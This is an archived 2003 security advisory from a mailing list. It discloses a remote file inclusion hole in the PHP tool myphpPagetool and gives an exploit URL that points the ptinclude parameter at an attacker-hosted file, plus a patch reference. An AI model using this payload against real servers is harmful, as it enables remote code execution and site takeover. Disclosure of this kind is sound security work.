[VulnWatch] myphpPagetool (php)

From: Frog Man (leseulfrog@hotmail.com)
Date: 02/02/03

  • Next message: Frog Man: "[VulnWatch] phpMyShop (php)" 
    From: "Frog Man" <leseulfrog@hotmail.com>
To: bugtraq@securityfocus.com
Date: Sun, 02 Feb 2003 18:06:43 +0100

    Informations :
    °°°°°°°°°°°°°°
    Version : 0.4.3-1
    Website : http://myphppagetool.sourceforge.net/
    Problem : Include file

    PHP Code/Location :
    °°°°°°°°°°°°°°°°°°°
    In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php,
    help4.php, help5.php, help6.php, help7.php, help8.php and help9.php :

    ----------------------------------------
    <?php
    include ($ptinclude . "/pt_config.inc");
    [...]
    ----------------------------------------

    Exploit :
    °°°°°°°°°
    http://[target]/doc/admin/index.php?ptinclude=http://[attacker]
    with :
    http://[attacker]/pt_config.inc

    (if registers_global=ON)

    Solution :
    °°°°°°°°°°
    A patch has been published on http://www.phpsecure.info .

    More details :
    °°°°°°°°°°°°°°
    In French :
    http://www.frog-man.org/tutos/myphpPagetool.txt
    Translated by Google :
    http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools1 +0100 (CET)

    frog-m@n

    _________________________________________________________________
    MSN Search, le moteur de recherche qui pense comme vous !
    http://search.fr.msn.be

    Relevant Pages

    • myphpPagetool (php)
      ... Website: http://myphppagetool.sourceforge.net/ ... include ($ptinclude. ... le moteur de recherche qui pense comme vous! ...
      (Bugtraq)
    • Re: Web Animation and Sound Advice Sought
      ... upon someone landing on my website, ... My blog program is a php program that makes use of a mysql database. ... linux (and the linux server supports all sorts of php). ... $500+ Premiere software -- at least on my first brief experimenting ...
      (misc.writing)
    • Re: Furthering my education in OOP - where/how can one learn professional skills?
      ... but I am not proud of the rather amateurish ... implement them in a website. ... is PHP the best language to use to learn and implement the full ... power of OOP? ...
      (comp.lang.php)
    • Re: Where to define functions as global?
      ... I'm building a website with PHP and MySQL. ... This is a scripting language, ...
      (alt.php)
    • Re: Restricting access to a website
      ... If, for example, my website is www .lahdedah. ... Yes or no would do and a PHP ... It can all be done in the Apache ... work on a shared server for a number of reasons - like he doesn't have access to the firewall configuration and the firewall is web host blind - it doesn't know that the request should be restricted only for one of the sites on the server, ...
      (comp.lang.php)